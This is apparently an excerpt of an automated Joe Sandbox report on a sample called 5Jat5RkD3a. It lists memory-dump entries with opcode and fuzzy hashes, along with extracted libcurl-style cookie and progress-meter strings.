                                                              • Snapshot File: hcaresult_0_2_270000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID: CloseHandle
                                                              • String ID:
                                                              • API String ID: 2962429428-0
                                                              • Opcode ID: 6c1d102a995c40e295f00e03342e587925eca2ec4f7157e17b13e2ba6c3868d4
                                                              • Instruction ID: 215d2d79f6478cfeddd77f3af81f3886e5b1cc7be3d422048133b3883151d743
                                                              • Opcode Fuzzy Hash: 6c1d102a995c40e295f00e03342e587925eca2ec4f7157e17b13e2ba6c3868d4
                                                              • Instruction Fuzzy Hash: 0E31B3B09193099FCB40EFB8D5856AEBBF5BF44304F00886DE998E7251E7349A44DF92
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1556804870.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_270000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID: Sleep
                                                              • String ID:
                                                              • API String ID: 3472027048-0
                                                              • Opcode ID: 42f54cf0440957404ab84118600b178818b66f6486ed494aac578da307281f5a
                                                              • Instruction ID: 139d5869bfc62b42b621a19b45df80a705bd5e19a8ca711750c10963ec66f21e
                                                              • Opcode Fuzzy Hash: 42f54cf0440957404ab84118600b178818b66f6486ed494aac578da307281f5a
                                                              • Instruction Fuzzy Hash: 4BC04CE0C1464486E740BA38954621D79E47741208FC11B68D98496195F628932C8657
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561606383.0000000007000000.00000040.00001000.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7000000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bedcf8cbb6bb5122f335db648478598cb27938dc50410c989a1e8246b6d2d9c5
                                                              • Instruction ID: 0c7b869084dc35fe8aa828230bdf2f1bf62a9fe15ab939114985506f13ee9e86
                                                              • Opcode Fuzzy Hash: bedcf8cbb6bb5122f335db648478598cb27938dc50410c989a1e8246b6d2d9c5
                                                              • Instruction Fuzzy Hash: 475179EB55C114BCB202C1816B24FFFA76EE7C7730F308A2BF856D1586E2940A4E51B2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561606383.0000000007000000.00000040.00001000.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7000000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d6e26b8a2f1f8b3dc21de13119eb5b08303dd5b40bf2f5b99ecfe4b39aedbb2b
                                                              • Instruction ID: 170ce769a0b946860b9c76d9cfc988a15804880cef6084b8d46a059f30fa8ac0
                                                              • Opcode Fuzzy Hash: d6e26b8a2f1f8b3dc21de13119eb5b08303dd5b40bf2f5b99ecfe4b39aedbb2b
                                                              • Instruction Fuzzy Hash: F05146EB15D114BDB201C1816B14FFFA76EE6C7730F30862BF866E5586E2940A4E51B2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561606383.0000000007000000.00000040.00001000.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7000000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8c56876e8a6ea591d73896b4fb78f8a7a630e0a7cc08af0769bb594a6f5d87fc
                                                              • Instruction ID: 3219397f8fad11a7197a2b59c21b6efd08bace15b6df80810a513779d4f71112
                                                              • Opcode Fuzzy Hash: 8c56876e8a6ea591d73896b4fb78f8a7a630e0a7cc08af0769bb594a6f5d87fc
                                                              • Instruction Fuzzy Hash: 0C5146EB15D114BDB10281816B14FFF676EE6C7730F318A2BF857E1586E2980E4E51B2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561606383.0000000007000000.00000040.00001000.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7000000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: de32d92e47f6de8ee8b779082e6c5e68e977e41b611e3d7dba6fa42f3c8c912c
                                                              • Instruction ID: ba976ca322f3822fc7be1940c950f03d316e6e5b46c315d54488272c323819ba
                                                              • Opcode Fuzzy Hash: de32d92e47f6de8ee8b779082e6c5e68e977e41b611e3d7dba6fa42f3c8c912c
                                                              • Instruction Fuzzy Hash: 095125EB15D114BDB102C1816B24FFFA76EE6C7730F318A2BF817E1586E2944A4E51B2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561606383.0000000007000000.00000040.00001000.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7000000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3228c1847d155b5f93853564974629bd9ed76d90e1328f1221e0fdc3430f1759
                                                              • Instruction ID: f67d8524e0e507c3f4257c6957f5ee70d5ceb83682d822e8022f47404c52afe5
                                                              • Opcode Fuzzy Hash: 3228c1847d155b5f93853564974629bd9ed76d90e1328f1221e0fdc3430f1759
                                                              • Instruction Fuzzy Hash: EC5134EB15C114BCB102C1816B24FFFA76EE6C7730F318A2BF816E1586E2944E4E11B2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561606383.0000000007000000.00000040.00001000.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7000000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5ab0fa960a0563d1e6d7f83944e08bf9d2cb99a30ee3bca725f1766f827f306d
                                                              • Instruction ID: d10ed56548a27f04b05d63db7546b0998df0d50a82f206a85157d3b20ba9b877
                                                              • Opcode Fuzzy Hash: 5ab0fa960a0563d1e6d7f83944e08bf9d2cb99a30ee3bca725f1766f827f306d
                                                              • Instruction Fuzzy Hash: C54115EB15D114BDB102C5816B24FFFA76EE6C7730F318A2BF816E1546E2980E4E51B2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561606383.0000000007000000.00000040.00001000.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7000000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f2a4e5cd34b8cd23b73dfd3e54f7665e7e0441a120156e516d114f4974786f7e
                                                              • Instruction ID: bb901c5e1d48dd89c146f8562bd4a6918fa0abf8e528093ea7c2b356211cf723
                                                              • Opcode Fuzzy Hash: f2a4e5cd34b8cd23b73dfd3e54f7665e7e0441a120156e516d114f4974786f7e
                                                              • Instruction Fuzzy Hash: A44137EB55C114BDB102C1816B24BFF676EE6C7730F308A27F816E1586E2940A4E51B2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561606383.0000000007000000.00000040.00001000.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7000000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cf8d3205d22ce7701fb019457f69a9ea4d3d362b8549f0ab9fb551bc1994d217
                                                              • Instruction ID: 3d08193a33fba89f05716da3e8d6a71fe5c89f900b410ce573196e350afd6a75
                                                              • Opcode Fuzzy Hash: cf8d3205d22ce7701fb019457f69a9ea4d3d362b8549f0ab9fb551bc1994d217
                                                              • Instruction Fuzzy Hash: B64158EB15C114BDB202C5816B24FFFA76EE6C7730F318A6BF816E1546E2940A4E51B2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561606383.0000000007000000.00000040.00001000.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7000000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8597c0b1d8dc299301062e83bcafd0b22cd8c4fbd0931eb167cd453d38f01362
                                                              • Instruction ID: 9e82e6f10101799e9e347d7856725f1218520139c1df0f7fba4202b6c4359d30
                                                              • Opcode Fuzzy Hash: 8597c0b1d8dc299301062e83bcafd0b22cd8c4fbd0931eb167cd453d38f01362
                                                              • Instruction Fuzzy Hash: 2D417CEB15C1147DB20285816F24FFFA76EE6C7730F30896BF816D2542E2980E4E51B2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561606383.0000000007000000.00000040.00001000.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7000000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 458b8a5c7c4e9d0d75cd55482372c537382a35bdd76b2c56741e8d73f6dbfc94
                                                              • Instruction ID: 12b472d31c1c1f5b15b0ac2bfaf9d84998f3563e2cf224a2167c6455c4346b62
                                                              • Opcode Fuzzy Hash: 458b8a5c7c4e9d0d75cd55482372c537382a35bdd76b2c56741e8d73f6dbfc94
                                                              • Instruction Fuzzy Hash: 894145EB15C114BDB102C5816B24FFFA76EE6C7730F30892BF816E1546E2940E4E11B2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561606383.0000000007000000.00000040.00001000.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7000000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 94e2b41b369872ba9643d08723b9279505432f4ea6e6c436044a9b2e71ab762a
                                                              • Instruction ID: a418ef6bffa3d8014ac4632d11cd099f266987f6f3bc28ab074f6b5f284a99d2
                                                              • Opcode Fuzzy Hash: 94e2b41b369872ba9643d08723b9279505432f4ea6e6c436044a9b2e71ab762a
                                                              • Instruction Fuzzy Hash: 9B4188EB15C1147DB202C1816B14FFFAB6EE6C7730F31896BF816E6546E2980E4E51B2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561606383.0000000007000000.00000040.00001000.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7000000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 704c971a7be02a1e5ee12e55dda9645a71dcee6a4a0c9ab5c632da766effb060
                                                              • Instruction ID: b75abaab222ae1ece18f17242099a8276172b7797cad4f92426ad27421d6def2
                                                              • Opcode Fuzzy Hash: 704c971a7be02a1e5ee12e55dda9645a71dcee6a4a0c9ab5c632da766effb060
                                                              • Instruction Fuzzy Hash: 564169EB1581147DB202C5816B14FFFA76EE6C7730F30856BF816E6646E2940E4E51B2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561606383.0000000007000000.00000040.00001000.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7000000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 67caa67c4dd31b7525f8d864912f3f5f2860cc24e0aaf7db355baa0ba1ad088a
                                                              • Instruction ID: 25add9bad3a4fedb6a1f0af1d201e93d6fe01d510f1a4e7b62efab0e22a59610
                                                              • Opcode Fuzzy Hash: 67caa67c4dd31b7525f8d864912f3f5f2860cc24e0aaf7db355baa0ba1ad088a
                                                              • Instruction Fuzzy Hash: EF3167EB158114BDB20285816B14BFFAB6EE6C7730F30892AF827E1586D2940E5E51B2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561606383.0000000007000000.00000040.00001000.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7000000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b26ebe671051a7776a2f6689d37efb431c46097c3cbc241b85d98d48d457f745
                                                              • Instruction ID: 643be9d089890dced74fef13a97e2a499309efbe27d16b1d9cf9ea3d1c07020e
                                                              • Opcode Fuzzy Hash: b26ebe671051a7776a2f6689d37efb431c46097c3cbc241b85d98d48d457f745
                                                              • Instruction Fuzzy Hash: 683138EB1581147DB102C5812B14BFFAB6EE6C7770F30896AF817E1586D2D80F5E51B2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561606383.0000000007000000.00000040.00001000.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7000000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 18c58ea163f47bd4933a4b9641bb45496e4cf795ff616824edbdd7c556ce9141
                                                              • Instruction ID: f0fe536b68bab6dc64b58346c67eba7fb548dd2540f1e553d1aa41896bc34a91
                                                              • Opcode Fuzzy Hash: 18c58ea163f47bd4933a4b9641bb45496e4cf795ff616824edbdd7c556ce9141
                                                              • Instruction Fuzzy Hash: 4D2128EB198114BDB11285856B24BFFA76EE3C7730F308A27F827D1586D2D40B5E60B2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561606383.0000000007000000.00000040.00001000.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7000000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6e8f5c002d6a5f6e61a75f98e16f925e642b9f892f565d78a30fc8768237fb84
                                                              • Instruction ID: 5b6eafcf5714b6e820da9f43d0b38db2457d1cf9d4175b33e5ef932ee9f620fe
                                                              • Opcode Fuzzy Hash: 6e8f5c002d6a5f6e61a75f98e16f925e642b9f892f565d78a30fc8768237fb84
                                                              • Instruction Fuzzy Hash: A421F7EB158114BDB11285816B24BFFA76EE2C7730F308527F817E1546D2D80B5E2072
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561606383.0000000007000000.00000040.00001000.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7000000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0264e722eb8002bef8cd0bb64ae4c971577f4831209587560a2609bb66746b41
                                                              • Instruction ID: c1e9dc07a1d10fdb74e9dac7725601572d53cb82bbf756887e5ce4511fad74fe
                                                              • Opcode Fuzzy Hash: 0264e722eb8002bef8cd0bb64ae4c971577f4831209587560a2609bb66746b41
                                                              • Instruction Fuzzy Hash: BF21D4EB1981147CB10285816B24BFFA76EE2C7730F30892BF817E1546D2D40F5E6072
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561606383.0000000007000000.00000040.00001000.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7000000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 296bfcc2ba6e9fce3c9f249106b2643b61a4758f03ffae0c1d38d65ccf3583e9
                                                              • Instruction ID: 6ffa273133e1d7d3687b6e828fb378249704c480ccefacc7268e47eee084747b
                                                              • Opcode Fuzzy Hash: 296bfcc2ba6e9fce3c9f249106b2643b61a4758f03ffae0c1d38d65ccf3583e9
                                                              • Instruction Fuzzy Hash: FB21AFEB258114BDB10285816B24BFFA76EE6C7730F30892BF817E0546D2954F5E6172
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561606383.0000000007000000.00000040.00001000.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7000000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 24640b72d7c7c0a6b3342ee47bfbb06619cb2fdce02c163dfcb55785085591a8
                                                              • Instruction ID: fdb24f4a5276ec6b28c105564947c3a78377f892aef86c26cf479c72a2aac84a
                                                              • Opcode Fuzzy Hash: 24640b72d7c7c0a6b3342ee47bfbb06619cb2fdce02c163dfcb55785085591a8
                                                              • Instruction Fuzzy Hash: 4621D5EB158114BDB10285816B24BFFA77EE6C6B30F30896AF827D1546E2D40E5E5172
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561606383.0000000007000000.00000040.00001000.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7000000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7ff4fbb6e43efd831428fb173b5482e356ce0e1416a3c1297332aa1a9d59a14c
                                                              • Instruction ID: 6ebe0a64cb2c046b47bdbfeebfabf483f6ec8e55dc1055bf21964b0204048a3d
                                                              • Opcode Fuzzy Hash: 7ff4fbb6e43efd831428fb173b5482e356ce0e1416a3c1297332aa1a9d59a14c
                                                              • Instruction Fuzzy Hash: B61144FB158114BDB202C6816B24BFEB77EE6C7630F30896AF813E1046D3940B4E6172
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561606383.0000000007000000.00000040.00001000.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7000000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3b92a7f46e2f3f8e309a99403bb31f244860199ce4d31d039a99249c44aeecbe
                                                              • Instruction ID: 04e45bd27a2b7f6015d8a967704ed12a88a7533ca115b3075f98e08389651ad6
                                                              • Opcode Fuzzy Hash: 3b92a7f46e2f3f8e309a99403bb31f244860199ce4d31d039a99249c44aeecbe
                                                              • Instruction Fuzzy Hash: C20165FA158114BDB60285816B24FFF677ED3C6630F308A6AF827D004AD3944E4A51B2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561606383.0000000007000000.00000040.00001000.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7000000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 902c920e12cde263a8831bcde85820c0b70139178c45667772947d6eff5544f2
                                                              • Instruction ID: 31c4cea9f76ef505da1c4e8a10d817a6a5e22cd6518b6f65de75dc5e8eb78857
                                                              • Opcode Fuzzy Hash: 902c920e12cde263a8831bcde85820c0b70139178c45667772947d6eff5544f2
                                                              • Instruction Fuzzy Hash: 5CF0A9FA118114ADB602C5816B24BFEA779D7C6230F308A67F827D0049C3A44B4A50B2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561606383.0000000007000000.00000040.00001000.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7000000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8ee90d0e833639e03901049bddcc6ca64da6ecd41cf321f851b04934d4457208
                                                              • Instruction ID: 987ee58bf7111afd6f714c70a67f9d29298d38bf33c4fd19177f56a37bc2736b
                                                              • Opcode Fuzzy Hash: 8ee90d0e833639e03901049bddcc6ca64da6ecd41cf321f851b04934d4457208
                                                              • Instruction Fuzzy Hash: 78F027F642C014ECB60285801650BFF27A8C7C7634F304D86E967E4089C2594F4681B6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1556804870.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                               • Associated: 00000000.00000002.1556781955.0000000000270000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1556804870.0000000000831000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1556804870.0000000000995000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1556804870.0000000000997000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558782224.000000000099A000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.000000000099C000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000B28000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000C32000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000C3B000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000D0F000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000D16000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1559190219.0000000000D26000.00000080.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1559336363.0000000000EDB000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1559359660.0000000000EDC000.00000080.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1559383699.0000000000EDD000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1559406514.0000000000EDE000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_270000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: #HttpOnly_$%s cookie %s="%s" for domain %s, path %s, expire %lld$;=$;$=$Added$FALSE$Replaced$TRUE$__Host-$__Secure-$cookie '%s' dropped, domain '%s' must not set cookies for '%s'$cookie '%s' for domain '%s' dropped, would overlay an existing cookie$cookie contains TAB, dropping$cookie.c$domain$expires$httponly$invalid octets in name/value, cookie dropped$libpsl problem, rejecting cookie for satety$max-age$oversized cookie dropped, name/val %zu + %zu bytes$path$secure$skipped cookie with bad tailmatch domain: %s$version
                                                              • API String ID: 0-1371176463
                                                              • Opcode ID: 2ed9484934d9fdf4996902263aa7e434cf25a0b9f16033af6f34a568f7814b47
                                                              • Instruction ID: 1708c0f2947b997aa2c3a6d81633ee0f031e15c17f1ed44e3e240cb0379120e0
                                                              • Opcode Fuzzy Hash: 2ed9484934d9fdf4996902263aa7e434cf25a0b9f16033af6f34a568f7814b47
                                                              • Instruction Fuzzy Hash: B6B24B70A28302DBD7209E24DC52BB67BD5AF54780F184828F88D9B282E775EC78D751
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1556804870.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                               • Associated: 00000000.00000002.1556781955.0000000000270000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1556804870.0000000000831000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1556804870.0000000000995000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1556804870.0000000000997000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558782224.000000000099A000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.000000000099C000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000B28000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000C32000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000C3B000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000D0F000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000D16000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1559190219.0000000000D26000.00000080.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1559336363.0000000000EDB000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1559359660.0000000000EDC000.00000080.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1559383699.0000000000EDD000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1559406514.0000000000EDE000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_270000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: %3lld %s %3lld %s %3lld %s %s %s %s %s %s %s$ %% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed$%2lld:%02lld:%02lld$%3lldd %02lldh$%7lldd$** Resuming transfer from byte position %lld$--:-$--:-$--:-$-:--$-:--$-:--$Callback aborted
                                                              • API String ID: 0-122532811
                                                              • Opcode ID: 0eefbbcb4e26df889ab52f6f2651c7f875b9209454d39c2ea52d2fef9d010d89
                                                              • Instruction ID: 5d436af8b4f73b6ca69bef751e9505304b47db3cd45a3862e80f6c369ec059d3
                                                              • Opcode Fuzzy Hash: 0eefbbcb4e26df889ab52f6f2651c7f875b9209454d39c2ea52d2fef9d010d89
                                                              • Instruction Fuzzy Hash: 1942D675B18701AFD708EE28CC41B6BB6EAFBC4704F048A2CF65D972D1D775A8148B92
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1556804870.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                               • Associated: 00000000.00000002.1556781955.0000000000270000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1556804870.0000000000831000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1556804870.0000000000995000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1556804870.0000000000997000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558782224.000000000099A000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.000000000099C000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000B28000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000C32000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000C3B000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000D0F000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000D16000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1559190219.0000000000D26000.00000080.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1559336363.0000000000EDB000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1559359660.0000000000EDC000.00000080.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1559383699.0000000000EDD000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1559406514.0000000000EDE000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_270000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Apr$Aug$Dec$Feb$Jan$Jul$Jun$Mar$May$Nov$Oct$Sep
                                                              • API String ID: 0-3977460686
                                                              • Opcode ID: f5795d137631114022af40911a19f41e5d8dedc2f056da9d3385a268351f25e1
                                                              • Instruction ID: 825e3764fb1bbfd3234724c02e3cbf00916b7a4899d1a27aba03d970cb79f2c4
                                                              • Opcode Fuzzy Hash: f5795d137631114022af40911a19f41e5d8dedc2f056da9d3385a268351f25e1
                                                              • Instruction Fuzzy Hash: 57327D75A293034BC714BE289C4132A7BD9AFD1320F15472DF9A58B3D2F774D9618B82
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1556804870.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
